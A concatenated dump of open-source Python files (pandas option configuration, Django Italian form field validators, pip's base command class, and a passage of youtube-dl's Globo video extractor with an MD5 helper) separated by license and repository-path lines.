_set_option(k, _registered_options[k].defval, silent=silent)
def get_default_val(pat):
key = _get_single_key(pat, silent=True)
return _get_registered_option(key).defval
class DictWrapper(object):
""" provide attribute-style access to a nested dict"""
def __init__(self, d, prefix=""):
object.__setattr__(self, "d", d)
object.__setattr__(self, "prefix", prefix)
def __setattr__(self, key, val):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
# you can't set new keys
# can you can't overwrite subtrees
if key in self.d and not isinstance(self.d[key], dict):
_set_option(prefix, val)
else:
raise OptionError("You can only set the value of existing options")
def __getattr__(self, key):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
v = object.__getattribute__(self, "d")[key]
if isinstance(v, dict):
return DictWrapper(v, prefix)
else:
return _get_option(prefix)
def __dir__(self):
return list(self.d.keys())
# For user convenience, we'd like to have the available options described
# in the docstring. For dev convenience we'd like to generate the docstrings
# dynamically instead of maintaining them by hand. To this, we use the
# class below which wraps functions inside a callable, and converts
# __doc__ into a propery function. The doctsrings below are templates
# using the py2.6+ advanced formatting syntax to plug in a concise list
# of options, and option descriptions.
class CallableDynamicDoc(object):
def __init__(self, func, doc_tmpl):
self.__doc_tmpl__ = doc_tmpl
self.__func__ = func
def __call__(self, *args, **kwds):
return self.__func__(*args, **kwds)
@property
def __doc__(self):
opts_desc = _describe_option('all', _print_desc=False)
opts_list = pp_options_list(list(_registered_options.keys()))
return self.__doc_tmpl__.format(opts_desc=opts_desc,
opts_list=opts_list)
_get_option_tmpl = """
get_option(pat)
Retrieves the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
Returns
-------
result : the value of the option
Raises
------
OptionError : if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_set_option_tmpl = """
set_option(pat, value)
Sets the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
value :
new value of option.
Returns
-------
None
Raises
------
OptionError if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_describe_option_tmpl = """
describe_option(pat, _print_desc=False)
Prints the description for one or more registered options.
Call with not arguments to get a listing for all registered options.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp pattern. All matching keys will have their description displayed.
_print_desc : bool, default True
If True (default) the description(s) will be printed to stdout.
Otherwise, the description(s) will be returned as a unicode string
(for testing).
Returns
-------
None by default, the description(s) as a unicode string if _print_desc
is False
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_reset_option_tmpl = """
reset_option(pat)
Reset one or more options to their default value.
Pass "all" as argument to reset all options.
Available options:
{opts_list}
Parameters
----------
pat : str/regex
If specified only options matching `prefix*` will be reset.
Note: partial matches are supported for convenience, but unless you
use the full option name (e.g. x.y.z.option_name), your code may break
in future versions if new options with similar names are introduced.
Returns
-------
None
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
# bind the functions with their docstrings into a Callable
# and use that as the functions exposed in pd.api
get_option = CallableDynamicDoc(_get_option, _get_option_tmpl)
set_option = CallableDynamicDoc(_set_option, _set_option_tmpl)
reset_option = CallableDynamicDoc(_reset_option, _reset_option_tmpl)
describe_option = CallableDynamicDoc(_describe_option, _describe_option_tmpl)
options = DictWrapper(_global_config)
#
# Functions for use by pandas developers, in addition to User - api
class option_context(object):
"""
Context manager to temporarily set options in the `with` statement context.
You need to invoke as ``option_context(pat, val, [(pat, val), ...])``.
Examples
--------
>>> with option_context('display.max_rows', 10, 'display.max_columns', 5):
...
"""
def __init__(self, *args):
if not (len(args) % 2 == 0 and len(args) >= 2):
raise ValueError('Need to invoke as'
'option_context(pat, val, [(pat, val), ...)).')
self.ops = list(zip(args[::2], args[1::2]))
def __enter__(self):
undo = []
for pat, val in self.ops:
undo.append((pat, _get_option(pat, silent=True)))
self.undo = undo
for pat, val in self.ops:
_set_option(pat, val, silent=True)
def __exit__(self, *args):
if self.undo:
for pat, val in self.undo:
_set_option(pat, val, silent=True)
def register_option(key, defval, doc='', validator=None, cb=None):
"""Register an option in the package-wide pandas config object
Parameters
----------
key - a fully-qualified key, e.g. "x.y.option - z".
defval - the default value of the option
doc - a string description of the option
validator - a function of a single argument, should raise `ValueError` if
called with a value which is not a legal value for the option.
cb - a function of a single argument "key", which is called
immediately after an option value is set/reset. key is
the full name of the option.
Returns
-------
Nothing.
Raises
------
ValueError if `validator` is specified and `defval` is not a valid value.
"""
import tokenize
import keyword
key = key.lower()
if key in _registered_options:
msg = "Option '{key}' has already been registered"
raise OptionError(msg.format(key=key))
if key in _reserved_keys:
msg = "Option '{key}' is a reserved key"
raise OptionError(msg.format(key=key))
# the default value should be legal
if validator:
validator(defval)
# walk the nested dict, creating dicts as needed along the path
path = key.split('.')
for k in path:
if not bool(re.match('^' + tokenize.Name + '$', k)):
raise ValueError("{k} is not a valid identifier".format(k=k))
if keyword.iskeyword(k):
raise ValueError("{k} is a python keyword".format(k=k))
cursor = _global_config
msg = "Path prefix to option '{option}' is already an option"
for i, p in enumerate(path[:-1]):
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:i])))
if p not in cursor:
cursor[p] = {}
cursor = cursor[p]
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:-1])))
cursor[path[-1]] = defval # initialize
# save the option metadata
_registered_options[key] = RegisteredOption(key=key, defval=defval,
doc=doc, validator=validator,
cb=cb)
def deprecate_option(key, msg=None, rkey=None, removal_ver=None):
"""
Mark option `key` as deprecated, if code attempts to access this option,
a warning will be produced, using `msg` if given, or a default message
if not.
if `rkey` is given, any access to the key will be re-routed to `rkey`.
Neither the existence of `key` nor that if `rkey` is checked. If they
do not exist, any subsequence access will fail as usual, after the
deprecation warning is given.
Parameters
----------
key - the name of the option to be deprecated. must be a fully-qualified
option name (e.g "x.y.z.rkey").
msg - (Optional) a warning message to output when the key is referenced.
if no message is given a default message will be emitted.
rkey - (Optional) the name of an option to reroute access to.
If specified, any referenced `key` will be re-routed to `rkey`
including set/get/reset.
rkey must be a fully-qualified option name (e.g "x.y.z.rkey").
used by the default message if no `msg` is specified.
removal_ver - (Optional) specifies the version in which this option will
be removed. used by the default message if no `msg`
is specified.
Returns
-------
Nothing
Raises
------
OptionError - if key has already been deprecated.
"""
key = key.lower()
if key in _deprecated_options:
msg = "Option '{key}' has already been defined as deprecated."
raise OptionError(msg.format(key=key))
_deprecated_options[key] = DeprecatedOption(key, msg, rkey, removal_ver)
#
# functions internal to the module
def _select_options(pat):
"""returns a list of keys matching `pat`
if pat=="all", returns all registered options
"""
# short-circuit for exact key
if pat in _registered_options:
return [pat]
# else look through all of them
keys = sorted(_registered_options.keys())
if pat == 'all': # reserved key
return keys
return [k for k in keys if re.search(pat, k, re.I)]
def _get_root(key):
path = key.split('.')
cursor = _global_config
for p in path[:-1]:
cursor = cursor[p]
return cursor, path[-1]
def _is_deprecated(key):
""" Returns True if the given option has been deprecated """
key = key.lower()
return key in _deprecated_options
def _get_deprecated_option(key):
"""
Retrieves the metadata for a deprecated option, if `key` is deprecated.
Returns
-------
DeprecatedOption (namedtuple) if key is deprecated, None otherwise
"""
try:
d = _deprecated_options[key]
except KeyError:
return None
else:
return d
def _get_registered_option(key):
"""
Retrieves the option metadata if `key` is a registered option.
Returns
-------
RegisteredOption (namedtuple) if key is deprecated, None otherwise
"""
return _registered_options.get(key)
def _translate_key(key):
"""
if key id deprecated and a replacement key defined, will return the
replacement key, otherwise returns `key` as - is
"""
d = _get_deprecated_option(key)
if d:
return d.rkey or key
else:
return key
def _warn_if_deprecated(key):
"""
Checks if `key` is a deprecated option and if so, prints a warning.
Returns
-------
bool - True if `key` is deprecated, False otherwise.
"""
d = _get_deprecated_option(key)
if d:
if d.msg:
print(d.msg)
warnings.warn(d.msg, DeprecationWarning)
else:
msg = "'{key}' is deprecated".format(key=key)
if d.removal_ver:
msg += (' and will be removed in {version}'
.format(version=d.removal_ver))
if d.rkey:
msg += ", please use '{rkey}' instead.".format(rkey=d.rkey)
else:
msg += ', please refrain from using it.'
warnings.warn(msg, DeprecationWarning)
return True
return False
def _build_option_description(k):
""" Builds a formatted description of a registered option and prints it """
o = _get_registered_option(k)
d = _get_deprecated_option(k)
s = u('{k} ').format(k=k)
if o.doc:
s += '\n'.join(o.doc.strip().split('\n'))
else:
s += 'No description available.'
if o:
s += (u('\n [default: {default}] [currently: {current}]')
.format(default=o.defval, current=_get_option(k, True)))
if d:
s += u('\n (Deprecated')
s += (u(', use `{rkey}` instead.')
.format(rkey=d.rkey if d.rkey else ''))
s += u(')')
s += '\n\n'
return s
def pp_options_list(keys, width=80, _print=False):
""" Builds a concise listing of available options, grouped by prefix """
from textwrap import wrap
from itertools import groupby
def pp(name, ks):
pfx = ('- ' + name + '.[' if name else '')
ls = wrap(', '.join(ks), width, initial_indent=pfx,
subsequent_indent=' ', break_long_words=False)
if ls and ls[-1] and name:
ls[-1] = ls[-1] + ']'
return ls
ls = []
singles = [x for x in sorted(keys) if x.find('.') < 0]
if singles:
ls += pp('', singles)
keys = [x for x in keys if x.find('.') >= 0]
for k, g in groupby(sorted(keys), lambda x: x[:x.rfind('.')]):
ks = [x[len(k) + 1:] for x in list(g)]
ls += pp(k, ks)
s = '\n'.join(ls)
if _print:
print(s)
else:
return s
#
# helpers
@contextmanager
def config_prefix(prefix):
"""contextmanager for multiple invocations of API with a common prefix
supported API functions: (register / get / set )__option
Warning: This is not thread - safe, and won't work properly if you import
the API functions into your module using the "from x import y" construct.
Example:
import pandas.core.config as cf
with cf.config_prefix("display.font"):
cf.register_option("color", "red")
cf.register_option("size", " 5 pt")
cf.set_option(size, " 6 pt")
cf.get_option(size)
...
etc'
will register options "display.font.color", "display.font.size", set the
value of "display.font.size"... and so on.
"""
# Note: reset_option relies on set_option, and on key directly
# it does not fit in to this monkey-patching scheme
global register_option, get_option, set_option, reset_option
def wrap(func):
def inner(key, *args, **kwds):
pkey = '{prefix}.{key}'.format(prefix=prefix, key=key)
return func(pkey, *args, **kwds)
return inner
_register_option = register_option
_get_option = get_option
_set_option = set_option
set_option = wrap(set_option)
get_option = wrap(get_option)
register_option = wrap(register_option)
yield None
set_option = _set_option
get_option = _get_option
register_option = _register_option
# These factories and methods are handy for use as the validator
# arg in register_option
def is_type_factory(_type):
"""
Parameters
----------
`_type` - a type to be compared against (e.g. type(x) == `_type`)
Returns
-------
validator - a function of a single argument x , which raises
ValueError if type(x) is not equal to `_type`
"""
def inner(x):
if type(x) != _type:
msg = "Value must have type '{typ!s}'"
raise ValueError(msg.format(typ=_type))
return inner
def is_instance_factory(_type):
"""
Parameters
----------
`_type` - the type to be checked against
Returns
-------
validator - a function of a single argument x , which raises
ValueError if x is not an instance of `_type`
"""
if isinstance(_type, (tuple, list)):
_type = tuple(_type)
from pandas.io.formats.printing import pprint_thing
type_repr = "|".join(map(pprint_thing, _type))
else:
type_repr = "'{typ}'".format(typ=_type)
def inner(x):
if not isinstance(x, _type):
msg = "Value must be an instance of {type_repr}"
raise ValueError(msg.format(type_repr=type_repr))
return inner
def is_one_of_factory(legal_values):
callables = [c for c in legal_values if callable(c)]
legal_values = [c for c in legal_values if not callable(c)]
def inner(x):
from pandas.io.formats.printing import pprint_thing as pp
if x not in legal_values:
if not any([c(x) for c in callables]):
pp_values = pp("|".join(lmap(pp, legal_values)))
msg = "Value must be one of {pp_values}"
if len(callables):
msg += " or a callable"
raise ValueError(msg.format(pp_values=pp_values))
return inner
# common type validators, for convenience
# usage: register_option(... , validator = is_int)
is_int = is_type_factory(int)
is_bool = is_type_factory(bool)
is_float = is_type_factory(float)
is_str = is_type_factory(str)
is_unicode = is_type_factory(compat.text_type)
is_text = is_instance_factory((str, bytes))
def is_callable(obj):
"""
Parameters
----------
`obj` - the object to be checked
Returns
-------
validator - returns True if object is callable
raises ValueError otherwise.
"""
if not callable(obj):
raise ValueError("Value must be a callable")
return True
| apache-2.0 |
zakuro9715/lettuce | tests/integration/lib/Django-1.2.5/django/contrib/localflavor/it/forms.py | 273 | 3027 | """
IT-specific Form helpers
"""
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
from django.contrib.localflavor.it.util import ssn_check_digit, vat_number_check_digit
import re
class ITZipCodeField(RegexField):
default_error_messages = {
'invalid': _('Enter a valid zip code.'),
}
def __init__(self, *args, **kwargs):
super(ITZipCodeField, self).__init__(r'^\d{5}$',
max_length=None, min_length=None, *args, **kwargs)
class ITRegionSelect(Select):
"""
A Select widget that uses a list of IT regions as its choices.
"""
def __init__(self, attrs=None):
from it_region import REGION_CHOICES
super(ITRegionSelect, self).__init__(attrs, choices=REGION_CHOICES)
class ITProvinceSelect(Select):
"""
A Select widget that uses a list of IT provinces as its choices.
"""
def __init__(self, attrs=None):
from it_province import PROVINCE_CHOICES
super(ITProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
class ITSocialSecurityNumberField(RegexField):
"""
A form field that validates Italian Social Security numbers (codice fiscale).
For reference see http://www.agenziaentrate.it/ and search for
'Informazioni sulla codificazione delle persone fisiche'.
"""
default_error_messages = {
'invalid': _(u'Enter a valid Social Security number.'),
}
def __init__(self, *args, **kwargs):
super(ITSocialSecurityNumberField, self).__init__(r'^\w{3}\s*\w{3}\s*\w{5}\s*\w{5}$',
max_length=None, min_length=None, *args, **kwargs)
def clean(self, value):
value = super(ITSocialSecurityNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = re.sub('\s', u'', value).upper()
try:
check_digit = ssn_check_digit(value)
except ValueError:
raise ValidationError(self.error_messages['invalid'])
if not value[15] == check_digit:
raise ValidationError(self.error_messages['invalid'])
return value
class ITVatNumberField(Field):
"""
A form field that validates Italian VAT numbers (partita IVA).
"""
default_error_messages = {
'invalid': _(u'Enter a valid VAT number.'),
}
def clean(self, value):
value = super(ITVatNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
try:
vat_number = int(value)
except ValueError:
raise ValidationError(self.error_messages['invalid'])
vat_number = str(vat_number).zfill(11)
check_digit = vat_number_check_digit(vat_number[0:10])
if not vat_number[10] == check_digit:
raise ValidationError(self.error_messages['invalid'])
return smart_unicode(vat_number)
| gpl-3.0 |
nitin-cherian/LifeLongLearning | Python/Experiments/JINJA/RealPython/jinja_env/lib/python3.5/site-packages/pip/basecommand.py | 341 | 11910 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import optparse
import warnings
from pip import cmdoptions
from pip.index import PackageFinder
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.req import InstallRequirement, parse_requirements
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import deprecation, get_prog, normalize_path
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
name = None
usage = None
hidden = False
log_streams = ("ext://sys.stdout", "ext://sys.stderr")
def __init__(self, isolated=False):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
'isolated': isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(
cmdoptions.general_group,
self.parser,
)
self.parser.add_option_group(gen_opts)
def _build_session(self, options, retries=None, timeout=None):
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = (
timeout if timeout is not None else options.timeout
)
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
if options.quiet:
if options.quiet == 1:
level = "WARNING"
if options.quiet == 2:
level = "ERROR"
else:
level = "CRITICAL"
elif options.verbose:
level = "DEBUG"
else:
level = "INFO"
# The root logger should match the "console" level *unless* we
# specified "--log" to send debug logs to a file.
root_level = level
if options.log:
root_level = "DEBUG"
logging_dictConfig({
"version": 1,
"disable_existing_loggers": False,
"filters": {
"exclude_warnings": {
"()": "pip.utils.logging.MaxLevelFilter",
"level": logging.WARNING,
},
},
"formatters": {
"indent": {
"()": IndentingFormatter,
"format": "%(message)s",
},
},
"handlers": {
"console": {
"level": level,
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[0],
"filters": ["exclude_warnings"],
"formatter": "indent",
},
"console_errors": {
"level": "WARNING",
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[1],
"formatter": "indent",
},
"user_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": options.log or "/dev/null",
"delay": True,
"formatter": "indent",
},
},
"root": {
"level": root_level,
"handlers": list(filter(None, [
"console",
"console_errors",
"user_log" if options.log else None,
])),
},
# Disable any logging besides WARNING unless we have DEBUG level
# logging enabled. These use both pip._vendor and the bare names
# for the case where someone unbundles our libraries.
"loggers": dict(
(
name,
{
"level": (
"WARNING"
if level in ["INFO", "ERROR"]
else "DEBUG"
),
},
)
for name in ["pip._vendor", "distlib", "requests", "urllib3"]
),
})
if sys.version_info[:2] == (2, 6):
warnings.warn(
"Python 2.6 is no longer supported by the Python core team, "
"please upgrade your Python. A future version of pip will "
"drop support for Python 2.6",
deprecation.Python26DeprecationWarning
)
# TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical(
'Could not find an activated virtualenv (required).'
)
sys.exit(VIRTUALENV_NOT_FOUND)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return ERROR
except CommandError as exc:
logger.critical('ERROR: %s', exc)
logger.debug('Exception information:', exc_info=True)
return ERROR
except KeyboardInterrupt:
logger.critical('Operation cancelled by user')
logger.debug('Exception information:', exc_info=True)
return ERROR
except:
logger.critical('Exception:', exc_info=True)
return UNKNOWN_ERROR
finally:
# Check if we're using the latest version of pip available
if (not options.disable_pip_version_check and not
getattr(options, "no_index", False)):
with self._build_session(
options,
retries=0,
timeout=min(5, options.timeout)) as session:
pip_version_check(session)
return SUCCESS
class RequirementCommand(Command):
@staticmethod
def populate_requirement_set(requirement_set, args, options, finder,
session, name, wheel_cache):
"""
Marshal cmd line args into a requirement set.
"""
for filename in options.constraints:
for req in parse_requirements(
filename,
constraint=True, finder=finder, options=options,
session=session, wheel_cache=wheel_cache):
requirement_set.add_requirement(req)
for req in args:
requirement_set.add_requirement(
InstallRequirement.from_line(
req, None, isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
for req in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(
req,
default_vcs=options.default_vcs,
isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
found_req_in_file = False
for filename in options.requirements:
for req in parse_requirements(
filename,
finder=finder, options=options, session=session,
wheel_cache=wheel_cache):
found_req_in_file = True
requirement_set.add_requirement(req)
# If --require-hashes was a line in a requirements file, tell
# RequirementSet about it:
requirement_set.require_hashes = options.require_hashes
if not (args or options.editables or found_req_in_file):
opts = {'name': name}
if options.find_links:
msg = ('You must give at least one requirement to '
'%(name)s (maybe you meant "pip %(name)s '
'%(links)s"?)' %
dict(opts, links=' '.join(options.find_links)))
else:
msg = ('You must give at least one requirement '
'to %(name)s (see "pip help %(name)s")' % opts)
logger.warning(msg)
def _build_package_finder(self, options, session,
platform=None, python_versions=None,
abi=None, implementation=None):
"""
Create a package finder appropriate to this requirement command.
"""
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
return PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
process_dependency_links=options.process_dependency_links,
session=session,
platform=platform,
versions=python_versions,
abi=abi,
implementation=implementation,
)
| mit |
fluks/youtube-dl | youtube_dl/extractor/globo.py | 22 | 19393 | # coding: utf-8
from __future__ import unicode_literals
import random
import math
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_chr,
compat_ord,
)
from ..utils import (
ExtractorError,
float_or_none,
)
class GloboIE(InfoExtractor):
_VALID_URL = 'https?://.+?\.globo\.com/(?P<id>.+)'
_API_URL_TEMPLATE = 'http://api.globovideos.com/videos/%s/playlist'
_SECURITY_URL_TEMPLATE = 'http://security.video.globo.com/videos/%s/hash?player=flash&version=2.9.9.50&resource_id=%s'
_VIDEOID_REGEXES = [
r'\bdata-video-id="(\d+)"',
r'\bdata-player-videosids="(\d+)"',
r'<div[^>]+\bid="(\d+)"',
]
_RESIGN_EXPIRATION = 86400
_TESTS = [
{
'url': 'http://globotv.globo.com/sportv/futebol-nacional/v/os-gols-de-atletico-mg-3-x-2-santos-pela-24a-rodada-do-brasileirao/3654973/',
'md5': '03ebf41cb7ade43581608b7d9b71fab0',
'info_dict': {
'id': '3654973',
'ext': 'mp4',
'title': 'Os gols de Atlético-MG 3 x 2 Santos pela 24ª rodada do Brasileirão',
'duration': 251.585,
'uploader': 'SporTV',
'uploader_id': 698,
'like_count': int,
}
},
{
'url': 'http://g1.globo.com/carros/autoesporte/videos/t/exclusivos-do-g1/v/mercedes-benz-gla-passa-por-teste-de-colisao-na-europa/3607726/',
'md5': 'b3ccc801f75cd04a914d51dadb83a78d',
'info_dict': {
'id': '3607726',
'ext': 'mp4',
'title': 'Mercedes-Benz GLA passa por teste de colisão na Europa',
'duration': 103.204,
'uploader': 'Globo.com',
'uploader_id': 265,
'like_count': int,
}
},
{
'url': 'http://g1.globo.com/jornal-nacional/noticia/2014/09/novidade-na-fiscalizacao-de-bagagem-pela-receita-provoca-discussoes.html',
'md5': '307fdeae4390ccfe6ba1aa198cf6e72b',
'info_dict': {
'id': '3652183',
'ext': 'mp4',
'title': 'Receita Federal explica como vai fiscalizar bagagens de quem retorna ao Brasil de avião',
'duration': 110.711,
'uploader': 'Rede Globo',
'uploader_id': 196,
'like_count': int,
}
},
]
class MD5():
HEX_FORMAT_LOWERCASE = 0
HEX_FORMAT_UPPERCASE = 1
BASE64_PAD_CHARACTER_DEFAULT_COMPLIANCE = ''
BASE64_PAD_CHARACTER_RFC_COMPLIANCE = '='
PADDING = '=0xFF01DD'
hexcase = 0
b64pad = ''
def __init__(self):
pass
class JSArray(list):
def __getitem__(self, y):
try:
return list.__getitem__(self, y)
except IndexError:
return 0
def __setitem__(self, i, y):
try:
return list.__setitem__(self, i, y)
except IndexError:
self.extend([0] * (i - len(self) + 1))
self[-1] = y
@classmethod
def hex_md5(cls, param1):
return cls.rstr2hex(cls.rstr_md5(cls.str2rstr_utf8(param1)))
@classmethod
def b64_md5(cls, param1, param2=None):
return cls.rstr2b64(cls.rstr_md5(cls.str2rstr_utf8(param1, param2)))
@classmethod
def any_md5(cls, param1, param2):
return cls.rstr2any(cls.rstr_md5(cls.str2rstr_utf8(param1)), param2)
@classmethod
def rstr_md5(cls, param1):
return cls.binl2rstr(cls.binl_md5(cls.rstr2binl(param1), len(param1) * 8))
@classmethod
def rstr2hex(cls, param1):
_loc_2 = '0123456789ABCDEF' if cls.hexcase else '0123456789abcdef'
_loc_3 = ''
for _loc_5 in range(0, len(param1)):
_loc_4 = compat_ord(param1[_loc_5])
_loc_3 += _loc_2[_loc_4 >> 4 & 15] + _loc_2[_loc_4 & 15]
return _loc_3
@classmethod
def rstr2b64(cls, param1):
_loc_2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_'
_loc_3 = ''
_loc_4 = len(param1)
for _loc_5 in range(0, _loc_4, 3):
_loc_6_1 = compat_ord(param1[_loc_5]) << 16
_loc_6_2 = compat_ord(param1[_loc_5 + 1]) << 8 if _loc_5 + 1 < _loc_4 else 0
_loc_6_3 = compat_ord(param1[_loc_5 + 2]) if _loc_5 + 2 < _loc_4 else 0
_loc_6 = _loc_6_1 | _loc_6_2 | _loc_6_3
for _loc_7 in range(0, 4):
if _loc_5 * 8 + _loc_7 * 6 > len(param1) * 8:
_loc_3 += cls.b64pad
else:
_loc_3 += _loc_2[_loc_6 >> 6 * (3 - _loc_7) & 63]
return _loc_3
@staticmethod
def rstr2any(param1, param2):
_loc_3 = len(param2)
_loc_4 = []
_loc_9 = [0] * ((len(param1) >> 2) + 1)
for _loc_5 in range(0, len(_loc_9)):
_loc_9[_loc_5] = compat_ord(param1[_loc_5 * 2]) << 8 | compat_ord(param1[_loc_5 * 2 + 1])
while len(_loc_9) > 0:
_loc_8 = []
_loc_7 = 0
for _loc_5 in range(0, len(_loc_9)):
_loc_7 = (_loc_7 << 16) + _loc_9[_loc_5]
_loc_6 = math.floor(_loc_7 / _loc_3)
_loc_7 -= _loc_6 * _loc_3
if len(_loc_8) > 0 or _loc_6 > 0:
_loc_8[len(_loc_8)] = _loc_6
_loc_4[len(_loc_4)] = _loc_7
_loc_9 = _loc_8
_loc_10 = ''
_loc_5 = len(_loc_4) - 1
while _loc_5 >= 0:
_loc_10 += param2[_loc_4[_loc_5]]
_loc_5 -= 1
return _loc_10
@classmethod
def str2rstr_utf8(cls, param1, param2=None):
_loc_3 = ''
_loc_4 = -1
if not param2:
param2 = cls.PADDING
param1 = param1 + param2[1:9]
while True:
_loc_4 += 1
if _loc_4 >= len(param1):
break
_loc_5 = compat_ord(param1[_loc_4])
_loc_6 = compat_ord(param1[_loc_4 + 1]) if _loc_4 + 1 < len(param1) else 0
if 55296 <= _loc_5 <= 56319 and 56320 <= _loc_6 <= 57343:
_loc_5 = 65536 + ((_loc_5 & 1023) << 10) + (_loc_6 & 1023)
_loc_4 += 1
if _loc_5 <= 127:
_loc_3 += compat_chr(_loc_5)
continue
if _loc_5 <= 2047:
_loc_3 += compat_chr(192 | _loc_5 >> 6 & 31) + compat_chr(128 | _loc_5 & 63)
continue
if _loc_5 <= 65535:
_loc_3 += compat_chr(224 | _loc_5 >> 12 & 15) + compat_chr(128 | _loc_5 >> 6 & 63) + compat_chr(
128 | _loc_5 & 63)
continue
if _loc_5 <= 2097151:
_loc_3 += compat_chr(240 | _loc_5 >> 18 & 7) + compat_chr(128 | _loc_5 >> 12 & 63) + compat_chr(
128 | _loc_5 >> 6 & 63) + compat_chr(128 | _loc_5 & 63)
return _loc_3
@staticmethod
def rstr2binl(param1):
_loc_2 = [0] * ((len(param1) >> 2) + 1)
for _loc_3 in range(0, len(_loc_2)):
_loc_2[_loc_3] = 0
for _loc_3 in range(0, len(param1) * 8, 8):
_loc_2[_loc_3 >> 5] |= (compat_ord(param1[_loc_3 // 8]) & 255) << _loc_3 % 32
return _loc_2
@staticmethod
def binl2rstr(param1):
_loc_2 = ''
for _loc_3 in range(0, len(param1) * 32, 8):
_loc_2 += compat_chr(param1[_loc_3 >> 5] >> _loc_3 % 32 & 255)
return _loc_2
@classmethod
def binl_md5(cls, param1, param2):
param1 = cls.JSArray(param1)
param1[param2 >> 5] |= 128 << param2 % 32
param1[(param2 + 64 >> 9 << 4) + 14] = param2
_loc_3 = 1732584193
_loc_4 = -271733879
_loc_5 = -1732584194
_loc_6 = 271733878
for _loc_7 in range(0, len(param1), 16):
_loc_8 = _loc_3
_loc_9 = _loc_4
_loc_10 = _loc_5
_loc_11 = _loc_6
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 0], 7, -680876936)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 1], 12, -389564586)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 2], 17, 606105819)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 3], 22, -1044525330)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 4], 7, -176418897)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 5], 12, 1200080426)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 6], 17, -1473231341)
